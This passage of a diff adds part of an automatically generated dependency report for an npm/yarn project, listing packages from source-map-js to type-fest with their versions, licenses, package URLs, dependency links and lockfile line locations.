+ "StartLine": 10094, + "EndLine": 10097 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "source-map-js@1.2.1", + "Name": "source-map-js", + "Identifier": { + "PURL": "pkg:npm/source-map-js@1.2.1", + "UID": "219c6c4823e8ff2a" + }, + "Version": "1.2.1", + "Licenses": [ + "BSD-3-Clause" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 10068, + "EndLine": 10071 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "source-map-support@0.5.21", + "Name": "source-map-support", + "Identifier": { + "PURL": "pkg:npm/source-map-support@0.5.21", + "UID": "7d37d41e2cebae09" + }, + "Version": "0.5.21", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "buffer-from@1.1.2", + "source-map@0.6.1" + ], + "Locations": [ + { + "StartLine": 10073, + "EndLine": 10079 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "spdx-correct@3.2.0", + "Name": "spdx-correct", + "Identifier": { + "PURL": "pkg:npm/spdx-correct@3.2.0", + "UID": "2ad2d2eaaffb873a" + }, + "Version": "3.2.0", + "Licenses": [ + "Apache-2.0" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "spdx-expression-parse@3.0.1", + "spdx-license-ids@3.0.22" + ], + "Locations": [ + { + "StartLine": 10104, + "EndLine": 10110 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "spdx-exceptions@2.5.0", + "Name": "spdx-exceptions", + "Identifier": { + "PURL": "pkg:npm/spdx-exceptions@2.5.0", + "UID": "e93ea6a0c758cfcf" + }, + "Version": "2.5.0", + "Licenses": [ + "CC-BY-3.0" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 10112, + "EndLine": 10115 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "spdx-expression-parse@3.0.1", + "Name": "spdx-expression-parse", + "Identifier": { + "PURL": "pkg:npm/spdx-expression-parse@3.0.1", + "UID": "9a8d4d050547ef08" + }, + "Version": "3.0.1", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "spdx-exceptions@2.5.0", + "spdx-license-ids@3.0.22" + ], + "Locations": [ + { + "StartLine": 10117, + "EndLine": 10123 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "spdx-expression-parse@4.0.0", + "Name": "spdx-expression-parse", + "Identifier": { + "PURL": "pkg:npm/spdx-expression-parse@4.0.0", + "UID": "657e65fcb4a33c29" + }, + "Version": "4.0.0", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "spdx-exceptions@2.5.0", + "spdx-license-ids@3.0.22" + ], + "Locations": [ + { + "StartLine": 10125, + "EndLine": 10131 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "spdx-license-ids@3.0.22", + "Name": "spdx-license-ids", + "Identifier": { + "PURL": "pkg:npm/spdx-license-ids@3.0.22", + "UID": "d31617146552343b" + }, + "Version": "3.0.22", + "Licenses": [ + "CC0-1.0" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 10133, + "EndLine": 10136 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "split-on-first@1.1.0", + "Name": "split-on-first", + "Identifier": { + "PURL": "pkg:npm/split-on-first@1.1.0", + "UID": "333b046e33ac9f5b" + }, + "Version": "1.1.0", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 10138, + "EndLine": 10141 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "sprintf-js@1.0.3", + "Name": "sprintf-js", + "Identifier": { + "PURL": "pkg:npm/sprintf-js@1.0.3", + "UID": "ffd0f2d4d204035a" + }, + "Version": "1.0.3", + "Licenses": [ + "BSD-3-Clause" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 10143, + "EndLine": 10146 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "ssri@12.0.0", + "Name": "ssri", + "Identifier": { + "PURL": "pkg:npm/ssri@12.0.0", + "UID": "2f15483b9ea1073f" + }, + "Version": "12.0.0", + "Licenses": [ + "ISC" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "minipass@7.1.2" + ], + "Locations": [ + { + "StartLine": 10160, + "EndLine": 10163 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "stack-generator@2.0.10", + "Name": "stack-generator", + "Identifier": { + "PURL": "pkg:npm/stack-generator@2.0.10", + "UID": "dcce3b7f838f08c0" + }, + "Version": "2.0.10", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "stackframe@1.3.4" + ], + "Locations": [ + { + "StartLine": 10172, + "EndLine": 10177 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "stack-utils@2.0.6", + "Name": "stack-utils", + "Identifier": { + "PURL": "pkg:npm/stack-utils@2.0.6", + "UID": "642525afe5322616" + }, + "Version": "2.0.6", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "escape-string-regexp@2.0.0" + ], + "Locations": [ + { + "StartLine": 10179, + "EndLine": 10184 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "stackframe@1.3.4", + "Name": "stackframe", + "Identifier": { + "PURL": "pkg:npm/stackframe@1.3.4", + "UID": "42f543782fa828b0" + }, + "Version": "1.3.4", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 10186, + "EndLine": 10189 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "stacktrace-gps@3.1.2", + "Name": "stacktrace-gps", + "Identifier": { + "PURL": "pkg:npm/stacktrace-gps@3.1.2", + "UID": "62820c8e55691c40" + }, + "Version": "3.1.2", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "source-map@0.5.6", + "stackframe@1.3.4" + ], + "Locations": [ + { + "StartLine": 10191, + "EndLine": 10197 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "stacktrace-js@2.0.2", + "Name": "stacktrace-js", + "Identifier": { + "PURL": "pkg:npm/stacktrace-js@2.0.2", + "UID": "88fc73f6d96bfe61" + }, + "Version": "2.0.2", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "error-stack-parser@2.1.4", + "stack-generator@2.0.10", + "stacktrace-gps@3.1.2" + ], + "Locations": [ + { + "StartLine": 10199, + "EndLine": 10206 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "stacktrace-parser@0.1.11", + "Name": "stacktrace-parser", + "Identifier": { + "PURL": "pkg:npm/stacktrace-parser@0.1.11", + "UID": "ab36b68fcfed33ac" + }, + "Version": "0.1.11", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "type-fest@0.7.1" + ], + "Locations": [ + { + "StartLine": 10208, + "EndLine": 10213 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "statuses@1.5.0", + "Name": "statuses", + "Identifier": { + "PURL": "pkg:npm/statuses@1.5.0", + "UID": "6e21b7ae267a9cdd" + }, + "Version": "1.5.0", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 10215, + "EndLine": 10218 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "statuses@2.0.1", + "Name": "statuses", + "Identifier": { + "PURL": "pkg:npm/statuses@2.0.1", + "UID": "2f5224787c555232" + }, + "Version": "2.0.1", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 10220, + "EndLine": 10223 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "stream-buffers@2.2.0", + "Name": "stream-buffers", + "Identifier": { + "PURL": "pkg:npm/stream-buffers@2.2.0", + "UID": "de45ad1818341e0b" + }, + "Version": "2.2.0", + "Licenses": [ + "Unlicense" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 10233, + "EndLine": 10236 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "streamx@2.23.0", + "Name": "streamx", + "Identifier": { + "PURL": "pkg:npm/streamx@2.23.0", + "UID": "b15dc1ecea0594ed" + }, + "Version": "2.23.0", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "events-universal@1.0.1", + "fast-fifo@1.3.2", + "text-decoder@1.2.3" + ], + "Locations": [ + { + "StartLine": 10238, + "EndLine": 10245 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "strict-uri-encode@2.0.0", + "Name": "strict-uri-encode", + "Identifier": { + "PURL": "pkg:npm/strict-uri-encode@2.0.0", + "UID": "d52ff4f00f3a985d" + }, + "Version": "2.0.0", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 10247, + "EndLine": 10250 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "string-hash-64@1.0.3", + "Name": "string-hash-64", + "Identifier": { + "PURL": "pkg:npm/string-hash-64@1.0.3", + "UID": "5f8e2196aa03499b" + }, + "Version": "1.0.3", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 10266, + "EndLine": 10269 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "string-width@1.0.2", + "Name": "string-width", + "Identifier": { + "PURL": "pkg:npm/string-width@1.0.2", + "UID": "d8eb4fae86e95a13" + }, + "Version": "1.0.2", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "code-point-at@1.1.0", + "is-fullwidth-code-point@1.0.0", + "strip-ansi@3.0.1" + ], + "Locations": [ + { + "StartLine": 10293, + "EndLine": 10300 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "string-width@4.2.3", + "Name": "string-width", + "Identifier": { + "PURL": "pkg:npm/string-width@4.2.3", + "UID": "54ff133b6a227ae8" + }, + "Version": "4.2.3", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "emoji-regex@8.0.0", + "is-fullwidth-code-point@3.0.0", + "strip-ansi@6.0.1" + ], + "Locations": [ + { + "StartLine": 10302, + "EndLine": 10309 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "string-width@5.1.2", + "Name": "string-width", + "Identifier": { + "PURL": "pkg:npm/string-width@5.1.2", + "UID": "20da29b0c6f35492" + }, + "Version": "5.1.2", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "eastasianwidth@0.2.0", + "emoji-regex@9.2.2", + "strip-ansi@7.1.2" + ], + "Locations": [ + { + "StartLine": 10311, + "EndLine": 10318 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "string-width-cjs@4.2.3", + "Name": "string-width-cjs", + "Identifier": { + "PURL": "pkg:npm/string-width-cjs@4.2.3", + "UID": "dc7b6a50908b2492" + }, + "Version": "4.2.3", + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "emoji-regex@8.0.0", + "is-fullwidth-code-point@3.0.0", + "strip-ansi@6.0.1" + ], + "Locations": [ + { + "StartLine": 10284, + "EndLine": 10291 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "string_decoder@1.1.1", + "Name": "string_decoder", + "Identifier": { + "PURL": "pkg:npm/string_decoder@1.1.1", + "UID": "f91a88ce727605d4" + }, + "Version": "1.1.1", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "safe-buffer@5.1.2" + ], + "Locations": [ + { + "StartLine": 10259, + "EndLine": 10264 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "string_decoder@1.3.0", + "Name": "string_decoder", + "Identifier": { + "PURL": "pkg:npm/string_decoder@1.3.0", + "UID": "b43521ec42e30c2a" + }, + "Version": "1.3.0", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "safe-buffer@5.2.1" + ], + "Locations": [ + { + "StartLine": 10252, + "EndLine": 10257 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "strip-ansi@3.0.1", + "Name": "strip-ansi", + "Identifier": { + "PURL": "pkg:npm/strip-ansi@3.0.1", + "UID": "d1fd98a13558fb7c" + }, + "Version": "3.0.1", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "ansi-regex@2.1.1" + ], + "Locations": [ + { + "StartLine": 10386, + "EndLine": 10391 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "strip-ansi@6.0.1", + "Name": "strip-ansi", + "Identifier": { + "PURL": "pkg:npm/strip-ansi@6.0.1", + "UID": "30dca36fd0f046f1" + }, + "Version": "6.0.1", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "ansi-regex@5.0.1" + ], + "Locations": [ + { + "StartLine": 10400, + "EndLine": 10405 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "strip-ansi@7.1.2", + "Name": "strip-ansi", + "Identifier": { + "PURL": "pkg:npm/strip-ansi@7.1.2", + "UID": "f09dd884e5b22743" + }, + "Version": "7.1.2", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "ansi-regex@6.2.2" + ], + "Locations": [ + { + "StartLine": 10407, + "EndLine": 10412 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "strip-ansi-cjs@6.0.1", + "Name": "strip-ansi-cjs", + "Identifier": { + "PURL": "pkg:npm/strip-ansi-cjs@6.0.1", + "UID": "21cd0c839a0d39ef" + }, + "Version": "6.0.1", + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "ansi-regex@5.0.1" + ], + "Locations": [ + { + "StartLine": 10379, + "EndLine": 10384 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "strip-final-newline@2.0.0", + "Name": "strip-final-newline", + "Identifier": { + "PURL": "pkg:npm/strip-final-newline@2.0.0", + "UID": "3d024c9581435638" + }, + "Version": "2.0.0", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 10419, + "EndLine": 10422 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "strip-indent@3.0.0", + "Name": "strip-indent", + "Identifier": { + "PURL": "pkg:npm/strip-indent@3.0.0", + "UID": "587c046c4e5b2a8f" + }, + "Version": "3.0.0", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "min-indent@1.0.1" + ], + "Locations": [ + { + "StartLine": 10424, + "EndLine": 10429 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "strip-json-comments@2.0.1", + "Name": "strip-json-comments", + "Identifier": { + "PURL": "pkg:npm/strip-json-comments@2.0.1", + "UID": "9520b7601c8aad3c" + }, + "Version": "2.0.1", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 10436, + "EndLine": 10439 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "strnum@1.1.2", + "Name": "strnum", + "Identifier": { + "PURL": "pkg:npm/strnum@1.1.2", + "UID": "f00a6e720de49321" + }, + "Version": "1.1.2", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 10441, + "EndLine": 10444 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "supports-color@10.2.2", + "Name": "supports-color", + "Identifier": { + "PURL": "pkg:npm/supports-color@10.2.2", + "UID": "40d71a92f8629a8f" + }, + "Version": "10.2.2", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 10446, + "EndLine": 10449 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "supports-color@5.5.0", + "Name": "supports-color", + "Identifier": { + "PURL": "pkg:npm/supports-color@5.5.0", + "UID": "7a0381de409b84e1" + }, + "Version": "5.5.0", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "has-flag@3.0.0" + ], + "Locations": [ + { + "StartLine": 10451, + "EndLine": 10456 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "supports-color@7.2.0", + "Name": "supports-color", + "Identifier": { + "PURL": "pkg:npm/supports-color@7.2.0", + "UID": "63bca08917b31f70" + }, + "Version": "7.2.0", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "has-flag@4.0.0" + ], + "Locations": [ + { + "StartLine": 10458, + "EndLine": 10463 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "supports-color@8.1.1", + "Name": "supports-color", + "Identifier": { + "PURL": "pkg:npm/supports-color@8.1.1", + "UID": "eb795688d57d1630" + }, + "Version": "8.1.1", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "has-flag@4.0.0" + ], + "Locations": [ + { + "StartLine": 10465, + "EndLine": 10470 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "supports-preserve-symlinks-flag@1.0.0", + "Name": "supports-preserve-symlinks-flag", + "Identifier": { + "PURL": "pkg:npm/supports-preserve-symlinks-flag@1.0.0", + "UID": "5290a6c0c0afd216" + }, + "Version": "1.0.0", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 10472, + "EndLine": 10475 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "svg-parser@2.0.4", + "Name": "svg-parser", + "Identifier": { + "PURL": "pkg:npm/svg-parser@2.0.4", + "UID": "e63e4aff54c5105d" + }, + "Version": "2.0.4", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 10477, + "EndLine": 10480 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "svgo@3.3.2", + "Name": "svgo", + "Identifier": { + "PURL": "pkg:npm/svgo@3.3.2", + "UID": "80489c325cac7574" + }, + "Version": "3.3.2", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "@trysound/sax@0.2.0", + "commander@7.2.0", + "css-select@5.2.2", + "css-tree@2.3.1", + "css-what@6.2.2", + "csso@5.0.5", + "picocolors@1.1.1" + ], + "Locations": [ + { + "StartLine": 10482, + "EndLine": 10493 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "tar@7.5.1", + "Name": "tar", + "Identifier": { + "PURL": "pkg:npm/tar@7.5.1", + "UID": "4114cf1deb64beb5" + }, + "Version": "7.5.1", + "Licenses": [ + "ISC" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "@isaacs/fs-minipass@4.0.1", + "chownr@3.0.0", + "minipass@7.1.2", + "minizlib@3.1.0", + "yallist@5.0.0" + ], + "Locations": [ + { + "StartLine": 10548, + "EndLine": 10555 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "tar-fs@2.1.4", + "Name": "tar-fs", + "Identifier": { + "PURL": "pkg:npm/tar-fs@2.1.4", + "UID": "66b8f9a8dadec602" + }, + "Version": "2.1.4", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "chownr@1.1.4", + "mkdirp-classic@0.5.3", + "pump@3.0.3", + "tar-stream@2.2.0" + ], + "Locations": [ + { + "StartLine": 10495, + "EndLine": 10503 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "tar-fs@3.1.1", + "Name": "tar-fs", + "Identifier": { + "PURL": "pkg:npm/tar-fs@3.1.1", + "UID": "3d30d1855e4877ff" + }, + "Version": "3.1.1", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "pump@3.0.3", + "tar-stream@3.1.7" + ], + "Locations": [ + { + "StartLine": 10505, + "EndLine": 10514 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "tar-stream@2.2.0", + "Name": "tar-stream", + "Identifier": { + "PURL": "pkg:npm/tar-stream@2.2.0", + "UID": "d05edbad1c0c8fa8" + }, + "Version": "2.2.0", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "bl@4.1.0", + "end-of-stream@1.4.5", + "fs-constants@1.0.0", + "inherits@2.0.4", + "readable-stream@3.6.2" + ], + "Locations": [ + { + "StartLine": 10516, + "EndLine": 10525 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "tar-stream@3.1.7", + "Name": "tar-stream", + "Identifier": { + "PURL": "pkg:npm/tar-stream@3.1.7", + "UID": "94cf543b143475c5" + }, + "Version": "3.1.7", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "b4a@1.7.3", + "fast-fifo@1.3.2", + "streamx@2.23.0" + ], + "Locations": [ + { + "StartLine": 10527, + "EndLine": 10534 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "terser@5.44.0", + "Name": "terser", + "Identifier": { + "PURL": "pkg:npm/terser@5.44.0", + "UID": "e0631b8e81c26b50" + }, + "Version": "5.44.0", + "Licenses": [ + "BSD-2-Clause" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "@jridgewell/source-map@0.3.11", + "acorn@8.15.0", + "commander@2.20.3", + "source-map-support@0.5.21" + ], + "Locations": [ + { + "StartLine": 10557, + "EndLine": 10565 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "test-exclude@6.0.0", + "Name": "test-exclude", + "Identifier": { + "PURL": "pkg:npm/test-exclude@6.0.0", + "UID": "6c10e1ecb744e2aa" + }, + "Version": "6.0.0", + "Licenses": [ + "ISC" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "@istanbuljs/schema@0.1.3", + "glob@7.2.3", + "minimatch@3.1.2" + ], + "Locations": [ + { + "StartLine": 10567, + "EndLine": 10574 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "text-decoder@1.2.3", + "Name": "text-decoder", + "Identifier": { + "PURL": "pkg:npm/text-decoder@1.2.3", + "UID": "c916b63b2cf935f3" + }, + "Version": "1.2.3", + "Licenses": [ + "Apache-2.0" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "b4a@1.7.3" + ], + "Locations": [ + { + "StartLine": 10576, + "EndLine": 10581 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "text-segmentation@1.0.3", + "Name": "text-segmentation", + "Identifier": { + "PURL": "pkg:npm/text-segmentation@1.0.3", + "UID": "c63c06b11e2f6385" + }, + "Version": "1.0.3", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "utrie@1.0.2" + ], + "Locations": [ + { + "StartLine": 10583, + "EndLine": 10588 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "text-table@0.2.0", + "Name": "text-table", + "Identifier": { + "PURL": "pkg:npm/text-table@0.2.0", + "UID": "d1f81fa343a1c681" + }, + "Version": "0.2.0", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 10595, + "EndLine": 10598 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "throat@5.0.0", + "Name": "throat", + "Identifier": { + "PURL": "pkg:npm/throat@5.0.0", + "UID": "86d58e2d47a4a96c" + }, + "Version": "5.0.0", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 10600, + "EndLine": 10603 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "tiny-queue@0.2.1", + "Name": "tiny-queue", + "Identifier": { + "PURL": "pkg:npm/tiny-queue@0.2.1", + "UID": "f148166bae911838" + }, + "Version": "0.2.1", + "Licenses": [ + "Apache-2.0" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 10605, + "EndLine": 10608 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "tiny-relative-date@2.0.2", + "Name": "tiny-relative-date", + "Identifier": { + "PURL": "pkg:npm/tiny-relative-date@2.0.2", + "UID": "29fc4694c4728722" + }, + "Version": "2.0.2", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 10610, + "EndLine": 10613 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "tinyglobby@0.2.15", + "Name": "tinyglobby", + "Identifier": { + "PURL": "pkg:npm/tinyglobby@0.2.15", + "UID": "8049df9404b4f119" + }, + "Version": "0.2.15", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "fdir@6.5.0", + "picomatch@4.0.3" + ], + "Locations": [ + { + "StartLine": 10615, + "EndLine": 10621 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "tmpl@1.0.5", + "Name": "tmpl", + "Identifier": { + "PURL": "pkg:npm/tmpl@1.0.5", + "UID": "ad55717fb893c578" + }, + "Version": "1.0.5", + "Licenses": [ + "BSD-3-Clause" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 10628, + "EndLine": 10631 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "to-regex-range@5.0.1", + "Name": "to-regex-range", + "Identifier": { + "PURL": "pkg:npm/to-regex-range@5.0.1", + "UID": "c7c5dfd7118dbf23" + }, + "Version": "5.0.1", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "is-number@7.0.0" + ], + "Locations": [ + { + "StartLine": 10633, + "EndLine": 10638 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "toidentifier@1.0.1", + "Name": "toidentifier", + "Identifier": { + "PURL": "pkg:npm/toidentifier@1.0.1", + "UID": "8c5e336c9c86623b" + }, + "Version": "1.0.1", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 10640, + "EndLine": 10643 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "treeverse@3.0.0", + "Name": "treeverse", + "Identifier": { + "PURL": "pkg:npm/treeverse@3.0.0", + "UID": "d61bfeff8f6071be" + }, + "Version": "3.0.0", + "Licenses": [ + "ISC" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 10645, + "EndLine": 10648 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "trim-newlines@3.0.1", + "Name": "trim-newlines", + "Identifier": { + "PURL": "pkg:npm/trim-newlines@3.0.1", + "UID": "b8af9cdc6c5fbe9d" + }, + "Version": "3.0.1", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 10650, + "EndLine": 10653 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "ts-dedent@2.2.0", + "Name": "ts-dedent", + "Identifier": { + "PURL": "pkg:npm/ts-dedent@2.2.0", + "UID": "e495e973875e3dff" + }, + "Version": "2.2.0", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 10660, + "EndLine": 10663 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "tslib@2.8.1", + "Name": "tslib", + "Identifier": { + "PURL": "pkg:npm/tslib@2.8.1", + "UID": "6e77a6572985ddf9" + }, + "Version": "2.8.1", + "Licenses": [ + "0BSD" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 10675, + "EndLine": 10678 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "tuf-js@4.0.0", + "Name": "tuf-js", + "Identifier": { + "PURL": "pkg:npm/tuf-js@4.0.0", + "UID": "1199d415ac308be3" + }, + "Version": "4.0.0", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "@tufjs/models@4.0.0", + "debug@4.4.3", + "make-fetch-happen@15.0.2" + ], + "Locations": [ + { + "StartLine": 10687, + "EndLine": 10692 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "tunnel-agent@0.6.0", + "Name": "tunnel-agent", + "Identifier": { + "PURL": "pkg:npm/tunnel-agent@0.6.0", + "UID": "ecdeaeaba38f9b3" + }, + "Version": "0.6.0", + "Licenses": [ + "Apache-2.0" + ], + "Indirect": true, + "Relationship": "indirect", + "DependsOn": [ + "safe-buffer@5.2.1" + ], + "Locations": [ + { + "StartLine": 10694, + "EndLine": 10699 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "type-detect@4.0.8", + "Name": "type-detect", + "Identifier": { + "PURL": "pkg:npm/type-detect@4.0.8", + "UID": "1a53754d8ba43838" + }, + "Version": "4.0.8", + "Licenses": [ + "MIT" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 10708, + "EndLine": 10711 + } + ], + "AnalyzedBy": "yarn" + }, + { + "ID": "type-fest@0.18.1", + "Name": "type-fest", + "Identifier": { + "PURL": "pkg:npm/type-fest@0.18.1", + "UID": "6fb8203cf3865def" + }, + "Version": "0.18.1", + "Licenses": [ + "(MIT OR CC0-1.0)" + ], + "Indirect": true, + "Relationship": "indirect", + "Locations": [ + { + "StartLine": 10713, + "EndLine": 10716 + } + 